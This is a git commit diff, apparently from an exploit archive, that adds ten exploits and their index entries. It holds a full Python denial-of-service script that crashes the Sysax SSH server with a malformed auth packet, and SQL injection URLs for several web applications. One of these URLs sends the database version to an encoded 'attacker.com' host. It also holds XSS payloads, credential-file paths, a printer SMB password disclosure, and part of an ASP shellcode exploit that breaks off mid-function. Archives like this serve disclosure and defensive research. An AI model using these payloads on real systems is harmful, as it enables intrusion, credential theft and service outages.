DB: 2015-08-30
10 new exploits
This commit is contained in:
parent
d891c95c0e
commit
4fe29b09c1
11 changed files with 799 additions and 0 deletions
10
files.csv
10
files.csv
|
@ -34314,3 +34314,13 @@ id,file,description,date,author,platform,type,port
|
|||
37999,platforms/java/webapps/37999.txt,"Jenkins 1.626 - Cross Site Request Forgery / Code Execution",2015-08-28,smash,java,webapps,0
|
||||
38000,platforms/php/webapps/38000.txt,"Wolf CMS Arbitrary File Upload To Command Execution",2015-08-28,"Narendra Bhati",php,webapps,80
|
||||
38002,platforms/php/webapps/38002.txt,"Pluck CMS 4.7.3 - Multiple Vulnerabilities",2015-08-28,smash,php,webapps,80
|
||||
38004,platforms/hardware/webapps/38004.txt,"Samsung SyncThruWeb 2.01.00.26 - SMB Hash Disclosure",2015-08-29,"Shad Malloy",hardware,webapps,80
|
||||
38005,platforms/windows/remote/38005.asp,"MS SQL Server 2000/2005 SQLNS.SQLNamespace COM Object Refresh() Unhandled Pointer Exploit",2015-08-29,ylbhz,windows,remote,0
|
||||
38006,platforms/php/webapps/38006.txt,"bloofoxCMS 0.3.5 Multiple Cross Site Scripting Vulnerabilities",2012-10-31,"Canberk BOLAT",php,webapps,0
|
||||
38007,platforms/php/webapps/38007.txt,"DCForum auth_user_file.txt File Multiple Information Disclosure Vulnerabilities",2012-11-02,r45c4l,php,webapps,0
|
||||
38008,platforms/php/webapps/38008.txt,"Joomla! com_parcoauto Component 'idVeicolo' Parameter Remote SQL Injection Vulnerability",2012-11-03,"Andrea Bocchetti",php,webapps,0
|
||||
38009,platforms/php/webapps/38009.txt,"AWAuctionScript CMS Multiple Remote Vulnerabilities",2012-11-04,X-Cisadane,php,webapps,0
|
||||
38010,platforms/php/webapps/38010.txt,"VeriCentre Multiple SQL Injection Vulnerabilities",2012-11-06,"Cory Eubanks",php,webapps,0
|
||||
38011,platforms/php/webapps/38011.txt,"OrangeHRM 'sortField' Parameter SQL Injection Vulnerability",2012-11-07,"High-Tech Bridge",php,webapps,0
|
||||
38012,platforms/php/webapps/38012.txt,"WordPress FLV Player Plugin 'id' Parameter SQL Injection Vulnerability",2012-11-07,"Ashiyane Digital Security Team",php,webapps,0
|
||||
38014,platforms/windows/dos/38014.py,"Sysax Multi Server 6.40 SSH Component Denial of Service",2015-08-29,3unnym00n,windows,dos,22
|
||||
|
|
Can't render this file because it is too large.
|
97
platforms/hardware/webapps/38004.txt
Executable file
97
platforms/hardware/webapps/38004.txt
Executable file
|
@ -0,0 +1,97 @@
|
|||
# Exploit Title: Samsung SyncThruWeb SMB Hash Disclosure
|
||||
|
||||
# Date: 8/28/15
|
||||
|
||||
# Exploit Author: Shad Malloy
|
||||
|
||||
# Contact: http://twitter.com/SecureNM
|
||||
|
||||
# Website: https://securenetworkmanagement.com
|
||||
|
||||
# Vendor Homepage: http://www.samsung.com
|
||||
|
||||
# Software Link:
|
||||
http://www.samsung.com/hk_en/consumer/solutions/type/SyncThruWebService.html
|
||||
|
||||
# Version: Known Vulnerable versions Samsung SCX-5835_5935 Series Printer
|
||||
Main Firmware Version : 2.01.00.26
|
||||
|
||||
Samsung SCX-5635 Series Printer Main Firmware Version : 2.01.01.18
|
||||
12-08-2009
|
||||
|
||||
|
||||
|
||||
# Tested on:
|
||||
|
||||
Samsung SCX-5835_5935 Series Printer
|
||||
|
||||
Main Firmware Version : 2.01.00.26
|
||||
|
||||
Network Firmware Version : V4.01.05(SCX-5835/5935)
|
||||
12-22-2008
|
||||
|
||||
Engine Firmware Version : 1.20.73
|
||||
|
||||
UI Firmware Version : V1.03.01.55 07-13-2009
|
||||
|
||||
Finisher Firmware Version : Not Installed
|
||||
|
||||
PCL5E Firmware Version : PCL5e 5.87 11-07-2008
|
||||
|
||||
PCL6 Firmware Version : PCL6 5.86 10-28-2008
|
||||
|
||||
PostScript Firmware Version : PS3 V1.93.06 12-19-2008
|
||||
|
||||
SPL Firmware Version : SPL 5.32 01-03-2008
|
||||
|
||||
TIFF Firmware Version : TIFF 0.91.00 10-07-2008
|
||||
|
||||
Samsung SCX-5635 Series
|
||||
|
||||
Main Firmware Version : 2.01.01.18 12-08-2009
|
||||
|
||||
Network Firmware Version : V4.01.16(SCX-5635)
|
||||
12-04-2009
|
||||
|
||||
Engine Firmware Version : 1.31.32
|
||||
|
||||
PCL5E Firmware Version : PCL5e 5.92 02-12-2009
|
||||
|
||||
|
||||
PCL6 Firmware Version : PCL6 5.93 03-21-2009
|
||||
|
||||
|
||||
PostScript Firmware Version : PS3 1.94.06 12-22-2008
|
||||
|
||||
TIFF Firmware Version : TIFF 0.91.00 10-07-2008
|
||||
|
||||
|
||||
|
||||
Proof of Concept
|
||||
|
||||
1. Using the default username and password (admin/admin), it is
|
||||
possible to obtain all credentials used for SMB file transfer. To obtain the
|
||||
file access http://<printer url>/smb_serverList.csv.
|
||||
|
||||
2. The UserName and UserPassword fields are unencrypted and
|
||||
visible using any text editor.
|
||||
|
||||
|
||||
|
||||
Relevant Patches
|
||||
|
||||
http://downloadcenter.samsung.com/content/FM/201508/20150825111208555/SCX563
|
||||
5_V2.01.01.28_0401113_1.00.zip
|
||||
|
||||
http://downloadcenter.samsung.com/content/FM/201508/20150825112233867/SCX583
|
||||
5_5935_V2.01.00.56_0401113_1.01.zip
|
||||
|
||||
|
||||
|
||||
Shad Malloy
|
||||
|
||||
Secure Network Management, LLC
|
||||
|
||||
|
||||
|
||||
|
10
platforms/php/webapps/38006.txt
Executable file
10
platforms/php/webapps/38006.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/56353/info
|
||||
|
||||
bloofoxCMS is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
bloofoxCMS 0.3.5 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/index.php?'"--><script>alert(0x0004B3)</script>
|
||||
http://www.example.com/index.php?search='"--><script>alert(0x0004B3)</script>
|
8
platforms/php/webapps/38007.txt
Executable file
8
platforms/php/webapps/38007.txt
Executable file
|
@ -0,0 +1,8 @@
|
|||
source: http://www.securityfocus.com/bid/56383/info
|
||||
|
||||
DCForum is prone to multiple information-disclosure vulnerabilities.
|
||||
|
||||
Exploiting these issues may allow an attacker to obtain sensitive information that may aid in further attacks.
|
||||
|
||||
http://www.example.com/cgi-bin/User_info/auth_user_file.txt
|
||||
http://www.example.com/cgi-bin/dcforum/User_info/auth_user_file.txt
|
7
platforms/php/webapps/38008.txt
Executable file
7
platforms/php/webapps/38008.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/56384/info
|
||||
|
||||
The Parcoauto component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/index.php?option=com_parcoauto&action=scheda&idVeicolo=2658810
|
13
platforms/php/webapps/38009.txt
Executable file
13
platforms/php/webapps/38009.txt
Executable file
|
@ -0,0 +1,13 @@
|
|||
source: http://www.securityfocus.com/bid/56388/info
|
||||
|
||||
AWAuctionScript CMS is prone to the following remote vulnerabilities because it fails to sufficiently sanitize user-supplied data:
|
||||
|
||||
1. A remote SQL-injection vulnerability.
|
||||
2. A remote file-upload vulnerability.
|
||||
3. An HTML-injection vulnerability.
|
||||
|
||||
Exploiting these issues could allow an attacker to execute arbitrary script code, upload arbitrary files, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
AWAuctionScript 1.0 is vulnerable; other version may also be affected.
|
||||
|
||||
http://www.example.com/listing.php?category=Website&PageNo=-1'[SQL-Injection Vulnerability!]
|
10
platforms/php/webapps/38010.txt
Executable file
10
platforms/php/webapps/38010.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/56409/info
|
||||
|
||||
VeriCentre is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
|
||||
|
||||
VeriCentre versions prior to 2.2 build 36 are vulnerable.
|
||||
|
||||
http://www.example.com/WebConsole/terminal/paramedit.aspx?TerminalId=%27%2bconvert%28int,@
|
||||
@version%29%2b%27&ModelName=xxxx&ApplicationName=xxxx&ClusterId=
|
9
platforms/php/webapps/38011.txt
Executable file
9
platforms/php/webapps/38011.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/56417/info
|
||||
|
||||
OrangeHRM is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
OrangeHRM 2.7.1-rc.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/symfony/web/index.php/admin/viewCustomers?sortOrder=ASC&sortField=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHA R(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114 ))))
|
9
platforms/php/webapps/38012.txt
Executable file
9
platforms/php/webapps/38012.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/56418/info
|
||||
|
||||
The FLV Player plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
FLV Player 1.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/wp-content/plugins/hitasoft_player/config.php?id=1%20union%20all%20select%201,2,3,4,5,6,7,8,user_login,10,11,12,13,14,15,16,17 from wp_users--
|
481
platforms/windows/dos/38014.py
Executable file
481
platforms/windows/dos/38014.py
Executable file
|
@ -0,0 +1,481 @@
|
|||
'''
|
||||
# Exploit title: Sysax Multi Server 6.40 ssh component denial of service vulnerability
|
||||
# Date: 29-8-2015
|
||||
# Vendor homepage: http://www.sysax.com
|
||||
# Software Link: http://www.sysax.com/download/sysaxserv_setup.msi
|
||||
# Version: 6.40
|
||||
# Author: 3unnym00n
|
||||
|
||||
# Details:
|
||||
# ----------------------------------------------
|
||||
# byte SSH_MSG_USERAUTH_REQUEST
|
||||
# string user name
|
||||
# string service
|
||||
# string "password"
|
||||
# boolean FALSE
|
||||
|
||||
# Sysax Multi ssh Server doesn't correctly handle SSH_MSG_USERAUTH_REQUEST packet , when the "user name" length malformed can lead dos
|
||||
|
||||
# Tested On: win7, xp
|
||||
# operating steps:
|
||||
1. install Sysax Multi Server
|
||||
2. manage server setting > connection protocols confugure > ssh2 based secure shell and sftp/scp on port 22
|
||||
3. restart the server to let the configuration take effect
|
||||
4. modify the hostname in this py.
|
||||
5. running the py, the py will raise exception: sock.recv(block_size) socket.error: [Errno 10054]
|
||||
netstat -ano , the "22" disappeared.
|
||||
running the py again, u will see connect failed socket.error: [Errno 10061]
|
||||
|
||||
|
||||
|
||||
# remark: u can also modify the user auth service request packet, to adjust different user, different password
|
||||
|
||||
|
||||
'''
|
||||
|
||||
import socket
|
||||
import struct
|
||||
import os
|
||||
from StringIO import StringIO
|
||||
from hashlib import sha1
|
||||
from Crypto.Cipher import Blowfish, AES, DES3, ARC4
|
||||
from Crypto.Util import Counter
|
||||
from hmac import HMAC
|
||||
|
||||
## suppose server accept our first dh kex: diffie-hellman-group14-sha1
|
||||
P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF
|
||||
G = 2
|
||||
__sequence_number_out = 3
|
||||
|
||||
zero_byte = chr(0)
|
||||
one_byte = chr(1)
|
||||
four_byte = chr(4)
|
||||
max_byte = chr(0xff)
|
||||
cr_byte = chr(13)
|
||||
linefeed_byte = chr(10)
|
||||
crlf = cr_byte + linefeed_byte
|
||||
|
||||
class Message (object):
|
||||
"""
|
||||
An SSH2 message is a stream of bytes that encodes some combination of
|
||||
strings, integers, bools, and infinite-precision integers (known in Python
|
||||
as longs). This class builds or breaks down such a byte stream.
|
||||
|
||||
Normally you don't need to deal with anything this low-level, but it's
|
||||
exposed for people implementing custom extensions, or features that
|
||||
paramiko doesn't support yet.
|
||||
"""
|
||||
|
||||
big_int = long(0xff000000)
|
||||
|
||||
def __init__(self, content=None):
|
||||
"""
|
||||
Create a new SSH2 message.
|
||||
|
||||
:param str content:
|
||||
the byte stream to use as the message content (passed in only when
|
||||
decomposing a message).
|
||||
"""
|
||||
if content is not None:
|
||||
self.packet = StringIO(content)
|
||||
else:
|
||||
self.packet = StringIO()
|
||||
|
||||
def __str__(self):
|
||||
"""
|
||||
Return the byte stream content of this message, as a string/bytes obj.
|
||||
"""
|
||||
return self.asbytes()
|
||||
|
||||
def __repr__(self):
|
||||
"""
|
||||
Returns a string representation of this object, for debugging.
|
||||
"""
|
||||
return 'paramiko.Message(' + repr(self.packet.getvalue()) + ')'
|
||||
|
||||
def asbytes(self):
|
||||
"""
|
||||
Return the byte stream content of this Message, as bytes.
|
||||
"""
|
||||
return self.packet.getvalue()
|
||||
|
||||
|
||||
def add_bytes(self, b):
|
||||
"""
|
||||
Write bytes to the stream, without any formatting.
|
||||
|
||||
:param str b: bytes to add
|
||||
"""
|
||||
self.packet.write(b)
|
||||
return self
|
||||
|
||||
def add_byte(self, b):
|
||||
"""
|
||||
Write a single byte to the stream, without any formatting.
|
||||
|
||||
:param str b: byte to add
|
||||
"""
|
||||
self.packet.write(b)
|
||||
return self
|
||||
|
||||
def add_boolean(self, b):
|
||||
"""
|
||||
Add a boolean value to the stream.
|
||||
|
||||
:param bool b: boolean value to add
|
||||
"""
|
||||
if b:
|
||||
self.packet.write(one_byte)
|
||||
else:
|
||||
self.packet.write(zero_byte)
|
||||
return self
|
||||
|
||||
def add_size(self, n):
|
||||
"""
|
||||
Add an integer to the stream.
|
||||
|
||||
:param int n: integer to add
|
||||
"""
|
||||
self.packet.write(struct.pack('>I', n))
|
||||
return self
|
||||
|
||||
def add_int(self, n):
|
||||
"""
|
||||
Add an integer to the stream.
|
||||
|
||||
:param int n: integer to add
|
||||
"""
|
||||
if n >= Message.big_int:
|
||||
self.packet.write(max_byte)
|
||||
self.add_string(deflate_long(n))
|
||||
else:
|
||||
self.packet.write(struct.pack('>I', n))
|
||||
return self
|
||||
|
||||
def add_int(self, n):
|
||||
"""
|
||||
Add an integer to the stream.
|
||||
|
||||
@param n: integer to add
|
||||
@type n: int
|
||||
"""
|
||||
if n >= Message.big_int:
|
||||
self.packet.write(max_byte)
|
||||
self.add_string(deflate_long(n))
|
||||
else:
|
||||
self.packet.write(struct.pack('>I', n))
|
||||
return self
|
||||
|
||||
def add_int64(self, n):
|
||||
"""
|
||||
Add a 64-bit int to the stream.
|
||||
|
||||
:param long n: long int to add
|
||||
"""
|
||||
self.packet.write(struct.pack('>Q', n))
|
||||
return self
|
||||
|
||||
def add_mpint(self, z):
|
||||
"""
|
||||
Add a long int to the stream, encoded as an infinite-precision
|
||||
integer. This method only works on positive numbers.
|
||||
|
||||
:param long z: long int to add
|
||||
"""
|
||||
self.add_string(deflate_long(z))
|
||||
return self
|
||||
|
||||
def add_string(self, s):
|
||||
"""
|
||||
Add a string to the stream.
|
||||
|
||||
:param str s: string to add
|
||||
"""
|
||||
self.add_size(len(s))
|
||||
self.packet.write(s)
|
||||
return self
|
||||
|
||||
def add_list(self, l):
|
||||
"""
|
||||
Add a list of strings to the stream. They are encoded identically to
|
||||
a single string of values separated by commas. (Yes, really, that's
|
||||
how SSH2 does it.)
|
||||
|
||||
:param list l: list of strings to add
|
||||
"""
|
||||
self.add_string(','.join(l))
|
||||
return self
|
||||
|
||||
def _add(self, i):
|
||||
if type(i) is bool:
|
||||
return self.add_boolean(i)
|
||||
elif isinstance(i, int):
|
||||
return self.add_int(i)
|
||||
elif type(i) is list:
|
||||
return self.add_list(i)
|
||||
else:
|
||||
return self.add_string(i)
|
||||
|
||||
def add(self, *seq):
|
||||
"""
|
||||
Add a sequence of items to the stream. The values are encoded based
|
||||
on their type: str, int, bool, list, or long.
|
||||
|
||||
.. warning::
|
||||
Longs are encoded non-deterministically. Don't use this method.
|
||||
|
||||
:param seq: the sequence of items
|
||||
"""
|
||||
for item in seq:
|
||||
self._add(item)
|
||||
|
||||
|
||||
def deflate_long(n, add_sign_padding=True):
|
||||
"""turns a long-int into a normalized byte string (adapted from Crypto.Util.number)"""
|
||||
# after much testing, this algorithm was deemed to be the fastest
|
||||
s = bytes()
|
||||
n = long(n)
|
||||
while (n != 0) and (n != -1):
|
||||
s = struct.pack('>I', n & long(0xffffffff)) + s
|
||||
n >>= 32
|
||||
# strip off leading zeros, FFs
|
||||
for i in enumerate(s):
|
||||
if (n == 0) and (i[1] != chr(0)):
|
||||
break
|
||||
if (n == -1) and (i[1] != chr(0xff)):
|
||||
break
|
||||
else:
|
||||
# degenerate case, n was either 0 or -1
|
||||
i = (0,)
|
||||
if n == 0:
|
||||
s = chr(0)
|
||||
else:
|
||||
s = chr(0xff)
|
||||
s = s[i[0]:]
|
||||
if add_sign_padding:
|
||||
if (n == 0) and (ord(s[0]) >= 0x80):
|
||||
s = chr(0) + s
|
||||
if (n == -1) and (ord(s[0]) < 0x80):
|
||||
s = chr(0xff) + s
|
||||
return s
|
||||
|
||||
def inflate_long(s, always_positive=False):
|
||||
"""turns a normalized byte string into a long-int (adapted from Crypto.Util.number)"""
|
||||
out = long(0)
|
||||
negative = 0
|
||||
if not always_positive and (len(s) > 0) and (ord(s[0]) >= 0x80):
|
||||
negative = 1
|
||||
if len(s) % 4:
|
||||
filler = chr(0)
|
||||
if negative:
|
||||
filler = chr(0xff)
|
||||
# never convert this to ``s +=`` because this is a string, not a number
|
||||
# noinspection PyAugmentAssignment
|
||||
s = filler * (4 - len(s) % 4) + s
|
||||
for i in range(0, len(s), 4):
|
||||
out = (out << 32) + struct.unpack('>I', s[i:i+4])[0]
|
||||
if negative:
|
||||
out -= (long(1) << (8 * len(s)))
|
||||
return out
|
||||
|
||||
def byte_mask(c, mask):
|
||||
return chr(ord(c) & mask)
|
||||
|
||||
|
||||
|
||||
|
||||
def _compute_key(K, H, session_id, id, nbytes):
|
||||
"""id is 'A' - 'F' for the various keys used by ssh"""
|
||||
m = Message()
|
||||
m.add_mpint(K)
|
||||
m.add_bytes(H)
|
||||
m.add_byte(str(id))
|
||||
m.add_bytes(session_id)
|
||||
out = sofar = sha1(m.asbytes()).digest()
|
||||
while len(out) < nbytes:
|
||||
m = Message()
|
||||
m.add_mpint(K)
|
||||
m.add_bytes(H)
|
||||
m.add_bytes(sofar)
|
||||
digest = sha1(m.asbytes()).digest()
|
||||
out += digest
|
||||
sofar += digest
|
||||
return out[:nbytes]
|
||||
|
||||
|
||||
def compute_hmac(key, message, digest_class):
|
||||
return HMAC(key, message, digest_class).digest()
|
||||
|
||||
|
||||
def read_msg(sock, block_engine_in, block_size, mac_size):
|
||||
header = sock.recv(block_size)
|
||||
header = block_engine_in.decrypt(header)
|
||||
packet_size = struct.unpack('>I', header[:4])[0]
|
||||
leftover = header[4:]
|
||||
buf = sock.recv(packet_size + mac_size - len(leftover))
|
||||
packet = buf[:packet_size - len(leftover)]
|
||||
post_packet = buf[packet_size - len(leftover):]
|
||||
packet = block_engine_in.decrypt(packet)
|
||||
packet = leftover + packet
|
||||
|
||||
def send_msg(sock, raw_data, block_engine_out, mac_engine_out, mac_key_out, mac_size):
|
||||
global __sequence_number_out
|
||||
out = block_engine_out.encrypt(raw_data)
|
||||
|
||||
payload = struct.pack('>I', __sequence_number_out) + raw_data
|
||||
out += compute_hmac(mac_key_out, payload, mac_engine_out)[:mac_size]
|
||||
sock.send(out)
|
||||
__sequence_number_out += 1
|
||||
|
||||
def exploit(hostname, port):
|
||||
|
||||
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
sock.connect((hostname, port))
|
||||
|
||||
## send client banner
|
||||
client_banner = 'SSH-2.0-SUCK\r\n'
|
||||
sock.send(client_banner)
|
||||
## recv server banner
|
||||
server_banner = ''
|
||||
while True:
|
||||
data = sock.recv(1)
|
||||
if data == '\x0a':
|
||||
break
|
||||
server_banner += data
|
||||
|
||||
print 'server banner is: ', server_banner.__repr__()
|
||||
|
||||
## do key exchange
|
||||
## send client algorithms
|
||||
cookie = os.urandom(16)
|
||||
|
||||
|
||||
client_kex = '000001cc0514'.decode('hex') + cookie + '000000596469666669652d68656c6c6d616e2d67726f757031342d736861312c6469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d736861312c6469666669652d68656c6c6d616e2d67726f7570312d73686131000000237373682d7273612c7373682d6473732c65636473612d736861322d6e69737470323536000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f7572323536000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f75723235360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d39360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d3936000000046e6f6e65000000046e6f6e65000000000000000000000000000000000000'.decode('hex')
|
||||
sock.send(client_kex)
|
||||
client_kex_init = client_kex[5:-5]
|
||||
|
||||
|
||||
## recv server algorithms
|
||||
server_kex = ''
|
||||
str_pl = sock.recv(4)
|
||||
pl = struct.unpack('>I', str_pl)[0]
|
||||
tmp = sock.recv(pl)
|
||||
padding_len = ord(tmp[0])
|
||||
server_kex_init = tmp[1:-padding_len]
|
||||
|
||||
## do dh kex
|
||||
## send client dh kex
|
||||
x = 2718749950853797850634218108087830670950606437648125981418769990607126772940049948484122336910062802584089370382091267133574445173294378254000629897200925498341633999513190035450218329607097225733329543524028305346861620006860852918487068859161361831623421024322904154569598752827192453199975754781944810347
|
||||
e = 24246061990311305114571813286712069338300342406114182522571307971719868860460945648993499340734221725910715550923992743644801884998515491806836377726946636968365751276828870539451268214005738703948104009998575652199698609897222885198283575698226413251759742449790092874540295563182579030702610986594679727200051817630511413715723789617829401744474112405554024371460263485543685109421717171156358397944976970310869333766947439381332202584288225313692797532554689171177447651177476425180162113468471927127194797168639270094144932251842745747512414228391665092351122762389774578913976053048427148163469934452204474329639
|
||||
client_dh_kex = '0000010c051e0000010100c010d8c3ea108d1915c9961f86d932f3556b82cd09a7e1d24c88f7d98fc88b19ca3908cada3244dfc5534860b967019560ce5ee243007d41ecf68e9bfa7631847ecb1091558fd7ffe2f17171115690a6d10f3b62c317157ced9291770cc452cc93fb911f18de644ef988c09a3bff35770e99d1546d31c320993f8c12bb275cd2742afc547a0f3309c29a6e72611af965b6144b837ca2003c3ca1f3e35797ab143669b9034c575794c645383519d485a133e67d0793097ef08b72523fa3199c35358676d1fd9776248cae08e46da6414d0f975ffa4b4c84f69db86c47401808daa8a5919fc52ebed157b99e0dd2a4203f0c9e06d6395fa5c9b38a7ae8b159ea270000000000'.decode('hex')
|
||||
sock.send(client_dh_kex)
|
||||
|
||||
## recv server dh kex
|
||||
str_pl = sock.recv(4)
|
||||
pl = struct.unpack('>I', str_pl)[0]
|
||||
server_dh_kex = sock.recv(pl)
|
||||
|
||||
## send client newkeys
|
||||
client_newkeys = '0000000c0a1500000000000000000000'.decode('hex')
|
||||
sock.send(client_newkeys)
|
||||
|
||||
## recv server newkeys
|
||||
str_pl = sock.recv(4)
|
||||
pl = struct.unpack('>I', str_pl)[0]
|
||||
server_new_keys = sock.recv(pl)
|
||||
|
||||
|
||||
## calc all we need ...
|
||||
host_key_len = struct.unpack('>I', server_dh_kex[2:6])[0]
|
||||
# print host_key_len
|
||||
host_key = server_dh_kex[6:6 + host_key_len]
|
||||
|
||||
f_len = struct.unpack('>I', server_dh_kex[6 + host_key_len:10 + host_key_len])[0]
|
||||
str_f = server_dh_kex[10 + host_key_len:10 + host_key_len + f_len]
|
||||
dh_server_f = inflate_long(str_f)
|
||||
|
||||
sig_len = struct.unpack('>I', server_dh_kex[10 + host_key_len + f_len:14 + host_key_len + f_len])[0]
|
||||
sig = server_dh_kex[14 + host_key_len + f_len:14 + host_key_len + f_len + sig_len]
|
||||
|
||||
K = pow(dh_server_f, x, P)
|
||||
## build up the hash H of (V_C || V_S || I_C || I_S || K_S || e || f || K), aka, session id
|
||||
hm = Message()
|
||||
|
||||
hm.add(client_banner.rstrip(), server_banner.rstrip(),
|
||||
client_kex_init, server_kex_init)
|
||||
|
||||
hm.add_string(host_key)
|
||||
hm.add_mpint(e)
|
||||
hm.add_mpint(dh_server_f)
|
||||
hm.add_mpint(K)
|
||||
|
||||
H = sha1(hm.asbytes()).digest()
|
||||
|
||||
## suppose server accept our first cypher: aes128-ctr, hmac-sha1
|
||||
block_size = 16
|
||||
key_size = 16
|
||||
mac_size = 20
|
||||
|
||||
IV_out = _compute_key(K, H, H, 'A', block_size)
|
||||
key_out = _compute_key(K, H, H, 'C', key_size)
|
||||
|
||||
block_engine_out = AES.new(key_out, AES.MODE_CTR, IV_out, Counter.new(nbits=block_size * 8, initial_value=inflate_long(IV_out, True)))
|
||||
mac_engine_out = sha1
|
||||
mac_key_out = _compute_key(K, H, H, 'E', mac_engine_out().digest_size)
|
||||
|
||||
IV_in = _compute_key(K, H, H, 'B', block_size)
|
||||
key_in = _compute_key(K, H, H, 'D', key_size)
|
||||
block_engine_in = AES.new(key_in, AES.MODE_CTR, IV_in, Counter.new(nbits=block_size * 8, initial_value=inflate_long(IV_in, True)))
|
||||
mac_engine_in = sha1
|
||||
mac_key_in = _compute_key(K, H, H, 'F', mac_engine_in().digest_size)
|
||||
|
||||
## do user auth
|
||||
## send client service request (user auth)
|
||||
client_service_request = '\x00\x00\x00\x1C\x0A\x05\x00\x00\x00\x0C\x73\x73\x68\x2D\x75\x73\x65\x72\x61\x75\x74\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
|
||||
## encrypt the packet
|
||||
send_msg(sock, client_service_request, block_engine_out, mac_engine_out, mac_key_out, mac_size)
|
||||
|
||||
|
||||
## recv server service accept
|
||||
read_msg(sock, block_engine_in, block_size, mac_size)
|
||||
|
||||
## send client userauth request
|
||||
client_userauth_request = '\x00\x00\x00\x3C\x08\x32'
|
||||
## the user name length and username
|
||||
client_userauth_request += '\x00\x00\x32\xe4' # malformed
|
||||
client_userauth_request += 'root'
|
||||
|
||||
## service
|
||||
client_userauth_request += '\x00\x00\x00\x0E'
|
||||
client_userauth_request += 'ssh-connection'
|
||||
|
||||
## password
|
||||
client_userauth_request += '\x00\x00\x00\x08'
|
||||
client_userauth_request += 'password'
|
||||
client_userauth_request += '\x00'
|
||||
|
||||
## plaintext password fuckinA
|
||||
client_userauth_request += '\x00\x00\x00\x07'
|
||||
client_userauth_request += 'fuckinA'
|
||||
|
||||
## padding
|
||||
client_userauth_request += '\x00'*8
|
||||
|
||||
## encrypt the packet
|
||||
print 'send client_userauth_request'
|
||||
send_msg(sock, client_userauth_request, block_engine_out, mac_engine_out, mac_key_out, mac_size)
|
||||
|
||||
|
||||
## recv server userauth success
|
||||
print 'recv server userauth success'
|
||||
read_msg(sock, block_engine_in, block_size, mac_size)
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
|
||||
hostname = '192.168.242.128'
|
||||
port = 22
|
||||
exploit(hostname, port)
|
145
platforms/windows/remote/38005.asp
Executable file
145
platforms/windows/remote/38005.asp
Executable file
|
@ -0,0 +1,145 @@
|
|||
<%
|
||||
Function Padding(intLen)
|
||||
Dim strRet, intSize
|
||||
intSize = intLen/2 - 1
|
||||
For I = 0 To intSize Step 1
|
||||
strRet = strRet & unescape("%u4141")
|
||||
Next
|
||||
Padding = strRet
|
||||
End Function
|
||||
|
||||
Function PackDWORD(strPoint)
|
||||
strTmp = replace(strPoint, "0x", "")
|
||||
PackDWORD = PackDWORD & UnEscape("%u" & Mid(strTmp, 5, 2) & Mid(strTmp, 7, 2))
|
||||
PackDWORD = PackDWORD & UnEscape("%u" & Mid(strTmp, 1, 2) & Mid(strTmp, 3, 2))
|
||||
End Function
|
||||
|
||||
Function PackList(arrList)
|
||||
For Each Item In arrList
|
||||
PackList = PackList & PackDWORD(Item)
|
||||
Next
|
||||
End Function
|
||||
|
||||
Function PackShellcode(strCode)
|
||||
intLen = Len(strCode) / 4
|
||||
If intLen Mod 2 = 1 Then
|
||||
strCode = strCode & "\x90"
|
||||
intLen = intLen + 1
|
||||
End If
|
||||
